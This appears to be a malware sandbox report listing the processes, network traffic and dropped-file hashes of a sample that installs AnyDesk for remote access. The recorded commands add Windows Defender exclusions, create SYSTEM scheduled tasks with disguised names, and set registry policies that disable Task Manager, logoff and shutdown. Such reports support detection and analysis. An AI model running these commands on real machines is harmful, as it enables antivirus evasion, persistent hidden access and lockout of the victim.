C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://ctt.ac/Y6e79

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --set-password

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\timeout.exe

timeout /T 2 /NOBREAK

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --start

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:537611 /prefetch:2

C:\Users\Admin\AppData\Roaming\locked.exe

"C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4D65.tmp\4D66.tmp\4D67.bat C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk

Network

Country Destination Domain Proto
US 8.8.8.8:53 boot.net.anydesk.com udp
DE 49.12.130.236:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-d4aa0625.net.anydesk.com udp
GB 57.128.141.164:443 relay-d4aa0625.net.anydesk.com tcp
DE 49.12.130.236:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 ctt.ac udp
US 134.209.68.5:443 ctt.ac tcp
US 134.209.68.5:443 ctt.ac tcp
US 8.8.8.8:53 clicktotweet.com udp
US 134.209.68.5:443 clicktotweet.com tcp
US 134.209.68.5:443 clicktotweet.com tcp
US 8.8.8.8:53 relay-ad195ac5.net.anydesk.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
GB 57.128.141.163:443 relay-ad195ac5.net.anydesk.com tcp
BE 64.233.167.157:443 stats.g.doubleclick.net tcp
BE 64.233.167.157:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:20001 udp
N/A 239.255.102.18:10810 udp
N/A 239.255.102.18:25830 udp
N/A 239.255.102.18:26112 udp
N/A 239.255.102.18:25149 udp
N/A 239.255.102.18:62977 udp
N/A 239.255.102.18:36142 udp
N/A 239.255.102.18:55586 udp
N/A 239.255.102.18:44143 udp
N/A 239.255.102.18:10296 udp
N/A 239.255.102.18:56456 udp
N/A 239.255.102.18:52980 udp
N/A 239.255.102.18:21155 udp
N/A 239.255.102.18:61452 udp
N/A 239.255.102.18:21298 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:45624 udp
N/A 239.255.102.18:38395 udp
N/A 239.255.102.18:62185 udp
N/A 239.255.102.18:56688 udp
N/A 239.255.102.18:45492 udp
N/A 239.255.102.18:486 udp
N/A 239.255.102.18:51771 udp
N/A 239.255.102.18:46409 udp
N/A 239.255.102.18:59788 udp
N/A 239.255.102.18:48667 udp
N/A 239.255.102.18:55503 udp
N/A 239.255.102.18:41705 udp
N/A 239.255.102.18:44565 udp
N/A 239.255.102.18:64446 udp
N/A 239.255.102.18:38749 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:19369 udp
N/A 239.255.102.18:43099 udp
N/A 239.255.102.18:11206 udp
N/A 239.255.102.18:60064 udp
N/A 239.255.102.18:55852 udp
N/A 239.255.102.18:57187 udp
N/A 239.255.102.18:51265 udp
N/A 239.255.102.18:4552 udp
N/A 239.255.102.18:8778 udp
N/A 239.255.102.18:47290 udp
US 104.244.42.1:443 twitter.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:28266 udp
N/A 239.255.102.18:38384 udp
N/A 239.255.102.18:11763 udp
N/A 239.255.102.18:24580 udp
N/A 239.255.102.18:319 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:853 udp
N/A 239.255.102.18:22296 udp
N/A 239.255.102.18:50605 udp
N/A 239.255.102.18:59456 udp
N/A 239.255.102.18:58819 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:25558 udp
N/A 239.255.102.18:39581 udp
N/A 239.255.102.18:60413 udp
N/A 239.255.102.18:40569 udp
N/A 239.255.102.18:53658 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:61947 udp
N/A 239.255.102.18:42999 udp
N/A 239.255.102.18:33490 udp
N/A 239.255.102.18:21645 udp
N/A 239.255.102.18:56528 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:44802 udp
N/A 239.255.102.18:13547 udp
N/A 239.255.102.18:37376 udp
N/A 239.255.102.18:48472 udp
N/A 239.255.102.18:36225 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:27047 udp
N/A 239.255.102.18:62609 udp
N/A 239.255.102.18:59297 udp
N/A 239.255.102.18:60884 udp
N/A 239.255.102.18:62567 udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 spankbang.com udp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 8.8.8.8:53 api.playanext.com udp
GB 18.245.187.82:80 api.playanext.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 8.8.8.8:53 tb.sb-cd.com udp
US 8.8.8.8:53 hls-uranus.sb-cd.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 c.ptgncdn.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 assets.sb-cd.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:24510 udp
N/A 239.255.102.18:64599 udp
N/A 239.255.102.18:15520 udp
N/A 239.255.102.18:2184 udp
N/A 239.255.102.18:5587 udp
N/A 239.255.102.18:49850 udp
N/A 239.255.102.18:7749 udp
N/A 239.255.102.18:25564 udp
N/A 239.255.102.18:38870 udp
N/A 239.255.102.18:13918 udp
N/A 239.255.102.18:3447 udp
N/A 239.255.102.18:36276 udp
N/A 239.255.102.18:40100 udp
N/A 239.255.102.18:19410 udp
N/A 239.255.102.18:9735 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:1279 udp
N/A 239.255.102.18:64354 udp
N/A 239.255.102.18:38725 udp
N/A 239.255.102.18:6665 udp
N/A 239.255.102.18:8207 udp
N/A 239.255.102.18:51741 udp
N/A 239.255.102.18:21497 udp
N/A 239.255.102.18:27055 udp
N/A 239.255.102.18:49700 udp
N/A 239.255.102.18:14762 udp
N/A 239.255.102.18:34392 udp
N/A 239.255.102.18:61015 udp
N/A 239.255.102.18:64695 udp
N/A 239.255.102.18:63830 udp
N/A 239.255.102.18:51588 udp
N/A 239.255.102.18:55614 udp
N/A 239.255.102.18:44671 udp
N/A 239.255.102.18:65330 udp
N/A 239.255.102.18:7621 udp
N/A 239.255.102.18:26820 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:9250 udp
N/A 239.255.102.18:12279 udp
N/A 239.255.102.18:32267 udp
N/A 239.255.102.18:12002 udp
N/A 239.255.102.18:20437 udp
US 104.18.33.166:443 deliver.ptgncdn.com tcp
US 104.18.33.166:443 deliver.ptgncdn.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 8.8.8.8:53 flagb93361.spankbang.com udp
US 104.19.131.98:443 flagb93361.spankbang.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 creative.xlviirdr.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 104.18.40.50:443 creative.xlviirdr.com tcp
US 104.18.40.50:443 creative.xlviirdr.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:24615 udp
N/A 239.255.102.18:21521 udp
N/A 239.255.102.18:1628 udp
N/A 239.255.102.18:13515 udp
N/A 239.255.102.18:63931 udp
N/A 239.255.102.18:64497 udp
N/A 239.255.102.18:10876 udp
N/A 239.255.102.18:13005 udp
N/A 239.255.102.18:8546 udp
N/A 239.255.102.18:63082 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:36176 udp
N/A 239.255.102.18:64864 udp
N/A 239.255.102.18:45802 udp
N/A 239.255.102.18:9958 udp
N/A 239.255.102.18:29095 udp
N/A 239.255.102.18:62585 udp
N/A 239.255.102.18:20894 udp
N/A 239.255.102.18:49123 udp
N/A 239.255.102.18:47244 udp
N/A 239.255.102.18:36151 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:42587 udp
N/A 239.255.102.18:43311 udp
N/A 239.255.102.18:1596 udp
N/A 239.255.102.18:59489 udp
N/A 239.255.102.18:16460 udp
N/A 239.255.102.18:8860 udp
N/A 239.255.102.18:43866 udp
N/A 239.255.102.18:2015 udp
N/A 239.255.102.18:17514 udp
N/A 239.255.102.18:37388 udp
US 8.8.8.8:53 go.xlviirdr.com udp
US 8.8.8.8:53 video.ktkjmp.com udp
US 172.64.147.206:443 go.xlviirdr.com tcp
US 104.18.48.21:443 video.ktkjmp.com tcp
US 104.18.48.21:443 video.ktkjmp.com tcp
US 172.64.147.206:443 go.xlviirdr.com tcp
US 8.8.8.8:53 img.strpst.com udp
US 104.17.11.106:443 img.strpst.com tcp
US 104.17.11.106:443 img.strpst.com tcp
US 8.8.8.8:53 go.xxxviiijmp.com udp
US 104.18.40.50:443 go.xxxviiijmp.com tcp
US 104.18.40.50:443 go.xxxviiijmp.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:23767 udp
N/A 239.255.102.18:27910 udp
N/A 239.255.102.18:30462 udp
N/A 239.255.102.18:27440 udp
N/A 239.255.102.18:58578 udp
N/A 239.255.102.18:19282 udp
N/A 239.255.102.18:33753 udp
N/A 239.255.102.18:43732 udp
N/A 239.255.102.18:24016 udp
N/A 239.255.102.18:18719 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:3880 udp
N/A 239.255.102.18:46706 udp
N/A 239.255.102.18:14899 udp
N/A 239.255.102.18:24722 udp
N/A 239.255.102.18:49528 udp
N/A 239.255.102.18:34678 udp
N/A 239.255.102.18:63517 udp
N/A 239.255.102.18:41669 udp
N/A 239.255.102.18:65345 udp
N/A 239.255.102.18:43672 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:23005 udp
N/A 239.255.102.18:41228 udp
N/A 239.255.102.18:52111 udp
N/A 239.255.102.18:23710 udp
N/A 239.255.102.18:46702 udp
N/A 239.255.102.18:37332 udp
N/A 239.255.102.18:15142 udp
N/A 239.255.102.18:28504 udp
N/A 239.255.102.18:54227 udp
N/A 239.255.102.18:44942 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:49318 udp
N/A 239.255.102.18:17726 udp
N/A 239.255.102.18:22026 udp
N/A 239.255.102.18:10297 udp
N/A 239.255.102.18:33010 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:48621 udp
N/A 239.255.102.18:5605 udp
N/A 239.255.102.18:16072 udp
N/A 239.255.102.18:53531 udp
N/A 239.255.102.18:27204 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:20684 udp
N/A 239.255.102.18:400 udp
N/A 239.255.102.18:53587 udp
N/A 239.255.102.18:9340 udp
N/A 239.255.102.18:34368 udp
N/A 239.255.102.18:9338 udp
N/A 239.255.102.18:40979 udp
N/A 239.255.102.18:59778 udp
N/A 239.255.102.18:22646 udp
N/A 239.255.102.18:21096 udp
N/A 239.255.102.18:21672 udp
N/A 239.255.102.18:16311 udp
N/A 239.255.102.18:15476 udp
N/A 239.255.102.18:59530 udp
N/A 239.255.102.18:33540 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:1614 udp
N/A 239.255.102.18:34897 udp
N/A 239.255.102.18:29230 udp
N/A 239.255.102.18:57242 udp
N/A 239.255.102.18:21804 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:48971 udp
N/A 239.255.102.18:49475 udp
N/A 239.255.102.18:27340 udp
N/A 239.255.102.18:16193 udp
N/A 239.255.102.18:27804 udp
N/A 239.255.102.18:12503 udp
N/A 239.255.102.18:24085 udp
N/A 239.255.102.18:34632 udp
N/A 239.255.102.18:50398 udp
N/A 239.255.102.18:31606 udp
N/A 239.255.102.18:27611 udp
N/A 239.255.102.18:64958 udp
N/A 239.255.102.18:18628 udp
N/A 239.255.102.18:17643 udp
N/A 239.255.102.18:59884 udp
N/A 239.255.102.18:32326 udp
N/A 239.255.102.18:19006 udp
N/A 239.255.102.18:40293 udp
N/A 239.255.102.18:56018 udp
N/A 239.255.102.18:10154 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:64144 udp
N/A 239.255.102.18:10804 udp
N/A 239.255.102.18:50882 udp
N/A 239.255.102.18:61897 udp
N/A 239.255.102.18:38690 udp
N/A 239.255.102.18:49171 udp
N/A 239.255.102.18:58160 udp
N/A 239.255.102.18:28342 udp
N/A 239.255.102.18:15329 udp
N/A 239.255.102.18:58295 udp
N/A 239.255.102.18:6982 udp
N/A 239.255.102.18:23476 udp
N/A 239.255.102.18:37755 udp
N/A 239.255.102.18:38980 udp
N/A 239.255.102.18:10135 udp
N/A 239.255.102.18:29860 udp
N/A 239.255.102.18:445 udp
N/A 239.255.102.18:40119 udp
N/A 239.255.102.18:12089 udp
N/A 239.255.102.18:15898 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:38993 udp
N/A 239.255.102.18:26014 udp
N/A 239.255.102.18:26352 udp
N/A 239.255.102.18:64609 udp
N/A 239.255.102.18:22818 udp
N/A 239.255.102.18:5009 udp
N/A 239.255.102.18:10497 udp
N/A 239.255.102.18:31142 udp
N/A 239.255.102.18:56231 udp
N/A 239.255.102.18:20173 udp
N/A 239.255.102.18:53569 udp
N/A 239.255.102.18:49187 udp
N/A 239.255.102.18:31221 udp
N/A 239.255.102.18:977 udp
N/A 239.255.102.18:45810 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:45810 udp
N/A 239.255.102.18:59339 udp
N/A 239.255.102.18:12052 udp
N/A 239.255.102.18:3940 udp
N/A 239.255.102.18:16498 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:44734 udp
N/A 239.255.102.18:54375 udp
N/A 239.255.102.18:13591 udp
N/A 239.255.102.18:49141 udp
N/A 239.255.102.18:57599 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:57389 udp
N/A 239.255.102.18:53076 udp
N/A 239.255.102.18:26191 udp
N/A 239.255.102.18:14215 udp
N/A 239.255.102.18:9652 udp
N/A 239.255.102.18:14482 udp
N/A 239.255.102.18:55881 udp
N/A 239.255.102.18:29977 udp
N/A 239.255.102.18:51315 udp
N/A 239.255.102.18:33111 udp
N/A 239.255.102.18:43405 udp
N/A 239.255.102.18:24106 udp
N/A 239.255.102.18:30216 udp
N/A 239.255.102.18:21982 udp
N/A 239.255.102.18:41917 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:49101 udp
N/A 239.255.102.18:63288 udp
N/A 239.255.102.18:10201 udp
N/A 239.255.102.18:57603 udp
N/A 239.255.102.18:45963 udp
N/A 239.255.102.18:7281 udp
N/A 239.255.102.18:25487 udp
N/A 239.255.102.18:12530 udp
N/A 239.255.102.18:52326 udp
N/A 239.255.102.18:23033 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:43015 udp
N/A 239.255.102.18:6538 udp
N/A 239.255.102.18:24990 udp
N/A 239.255.102.18:26541 udp
N/A 239.255.102.18:27845 udp
N/A 239.255.102.18:46687 udp
N/A 239.255.102.18:21983 udp
N/A 239.255.102.18:40618 udp
N/A 239.255.102.18:3831 udp
N/A 239.255.102.18:8743 udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs

MD5 3c37e86d3572f4f291e0bf5c9ab78e41
SHA1 4a2617dbbba0fc65275bbacf6738d604cbfd4eae
SHA256 426f46f8c62e39fffe4e2763cf87d3b5de568b0a0179737028db0e2ed43d0e16
SHA512 5e827131ef024f358d3fc952f8b489003568b948d0a5a24556db1aeb8b00b21a04d1f6483652bf830a5050ccc3d734b27bf385129007305a93d16d844e84303c

C:\Users\Admin\AppData\Roaming\doorbell-sys.exe

MD5 583050ddb118acb68beb4e210b243c53
SHA1 da7a9d361cb60ebe9e767710585cfeb4d0f84444
SHA256 10c2c130f92a90332bf66f137978ff49d88397b71f0e31a9fccbfeabc1968245
SHA512 de869a3ee8d793a42a432c12b3cc6c0a4fbd60e4713c2f5199c576841c0d6640f66f9b2ba88af97f6b5dce5498cb5387687924941f1f24db8136a8bbe4cfece5

C:\Users\Admin\AppData\Local\Temp\21D3.tmp\21D4.tmp\21D5.bat

MD5 c9dc4166ceb77ae5e86ea472b989b34c
SHA1 340ee384d950b11977799791854c793e7347b091
SHA256 223338d4ba378aa7d08dec85f046a0c56accb9fb02dd01a9876c69a428fc0594
SHA512 8533e83302ddc866d2e41e7adcc000083537d5975668bc9ac5266dfe43f89cf384d10eeecabeb940fc69f02d80ae5a8efd5c29ff084b3ca90b4bb7e13c95c7fe

C:\Users\Admin\Downloads\AnyDesk.exe

MD5 aee6801792d67607f228be8cec8291f9
SHA1 bf6ba727ff14ca2fddf619f292d56db9d9088066
SHA256 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499
SHA512 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f

memory/3012-31-0x0000000001090000-0x00000000027D9000-memory.dmp

memory/2792-38-0x0000000001090000-0x00000000027D9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 4a56c6a2d4899e7b25a4fa79d1bc94a4
SHA1 1396ac182235801ab0d121822bb96b3414c34895
SHA256 f5acb4134c1024590be411b9cd57d794ef9e38dff3a98948c36bf915c27dbc4f
SHA512 aa2a770ede3508fcf05b8006f70a3696f64e1b2ee9d940b62977132a547cc0051329359dfdfbb660746bed31727eacc361007002dece3c37bdb01d966b9dcb0f

memory/2984-48-0x0000000001090000-0x00000000027D9000-memory.dmp

C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf

MD5 a787c308bd30d6d844e711d7579be552
SHA1 473520be4ea56333d11a7a3ff339ddcadfe77791
SHA256 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440
SHA512 da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973

C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace

MD5 f4fb409ecde15202fdeb9b1a17b2dade
SHA1 81dafc4ec53e826978235c117f28b498dcfc43e2
SHA256 43dff269482a34b78ae3de0ee866b94c704bd19ed79294009c4df63324b57c2d
SHA512 4531f03626ed4d3fe772b1a04eb59b013b7bfdda675a93aed44e7a3a1076ade6b387c0286bba6516ae234fc3e2d2d501c87745a9df1d11038886bcdec1f8c7f2

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 744b34b58fb1219ccb2e6ab8bed9fdb4
SHA1 86acfeb4512c1fe52de5f35c4c9f5910115a042e
SHA256 daec21fbf622b98fec4da3ed08a6fed59babc2d65248303b089430e63dcee428
SHA512 8c03dc310ac54b597c718e6e151d08cd2bf791006b4142b821c7d4927a276b477bc36916293f28907b4286d0cbb25b6b8a0de3978e7bb71002b5c77307c8422a

C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf

MD5 5b4c9f2b9e5f7fd381cd1274567abd96
SHA1 809dad4e98bd23109358d9a76745ac6674a70a99
SHA256 4066f069c73b2c862e0ff4b13bcdda69e8be652b8a68c32e8d4c8afa10d3423a
SHA512 f9e3144418964b36f33c41e2143938bdac1bdad061df794a97e5fc754f217d10fd26339f448ea17c7d253cca70fcf92f7ca7410082c2f9e22edea4cd339b9d14

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 52e12ab9343da2ecd309936c1bc875fc
SHA1 8af5668f51779d5fa2b1ca0a3d56dcfed0925b9f
SHA256 dfa7dfd141c1cd2b799f066af5fad58a3bbb0d3c2ef5cb40003d41c601da6859
SHA512 32276cbadf58ecca7f2fb30fd98656b7fc803a4260f4a17259764a5ddae7fc966d5be8a15df57d5a65b77fc23334e80984e1a3a94a89d1d4070289f962f6569b

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 0301a4c01baff81872539c058d24d2ac
SHA1 3c4f0590dd9c729992499341030e0a4fd8c87255
SHA256 b223e2079cb83d01184e2c7488e591e5c340a80fdc3a1b3acedb7b6fde124762
SHA512 6f31c08254cc1cc40e8b987501e47800d1d039cd2caa37640519980f4b41b0f6051897ce15c06ab7299d2f08c850bf71fe9102d3604444fe701c3a9c7a162ea2

C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2792-153-0x0000000001090000-0x00000000027D9000-memory.dmp

memory/2984-154-0x0000000001090000-0x00000000027D9000-memory.dmp

memory/1476-161-0x0000000000250000-0x0000000001999000-memory.dmp

C:\ProgramData\AnyDesk\system.conf

MD5 afdc4f69f4720b8c4153f6186f49a2b6
SHA1 329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA256 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
